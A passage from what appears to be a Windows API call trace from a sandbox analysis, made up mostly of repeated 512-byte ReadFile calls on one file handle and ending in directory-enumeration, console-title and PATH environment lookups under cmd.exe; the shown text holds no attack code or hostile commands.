lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.989] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0150.028] _close (_FileHandle=4) returned 0 [0150.028] FindNextFileW (in: hFindFile=0x32e768, lpFindFileData=0x2aee50 | out: lpFindFileData=0x2aee50) returned 0 [0150.028] GetLastError () returned 0x12 [0150.028] FindClose (in: hFindFile=0x32e768 | out: hFindFile=0x32e768) returned 1 [0150.029] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0150.031] _close (_FileHandle=3) returned 0 [0150.031] GetConsoleTitleW (in: lpConsoleTitle=0x2af288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 